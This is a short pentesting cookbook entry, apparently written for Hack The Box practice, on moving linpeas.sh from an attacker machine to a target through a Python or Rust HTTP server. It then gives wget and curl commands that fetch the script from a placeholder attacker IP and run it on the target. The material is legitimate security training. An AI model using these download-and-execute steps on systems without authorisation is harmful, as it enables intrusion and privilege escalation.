File Transfer and Execution via HTTP Server

This technique is a method used to transfer tools from an attacker-controlled machine to a target machine. It involves two main stages: hosting the file on the attacker's machine using a simple web server and downloading and executing it on the target machine.

The example below uses linpeas.sh, a popular script for auditing and discovering privilege escalation paths on Linux systems.

On the attacker machine:

Method 01: Python

# Download the latest version of linpeas.sh
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

# Serve the current directory on chosen port
python3 -m http.server <attacker-port>

Method 02: Rust

# First, install the crate
cargo install simple-http-server

# Then run the server
simple-http-server . --port <attacker-port>

On the target machine:

# Navigate to a temporary directory
cd /tmp

# Download the script from the attacker's server
wget http://<attacker-ip>:<attacker-port>/linpeas.sh -O /tmp/linpeas.sh

If wget is not available, curl is a common alternative:

curl http://<attacker-ip>:<attacker-port>/linpeas.sh -o linpeas.sh

Running it

# Grant it execute permissions
chmod +x linpeas.sh
# Execute with bash
bash linpeas.sh

Tags

http-transfer

Notes

Some of this writeup is revised by AI. My own writing can be a bit clunky, so I get it to review certain parts to make things flow better and be a bit easier to read.

If you liked this content, please give me a respect on my Hack The Box profile. I'd be happy to hear I've helped you.

If anything here isn't clear, check out the cookbook. If you can't find the answer or need further clarification, please contact me at my e-mail.

Last updated: 2025-10-29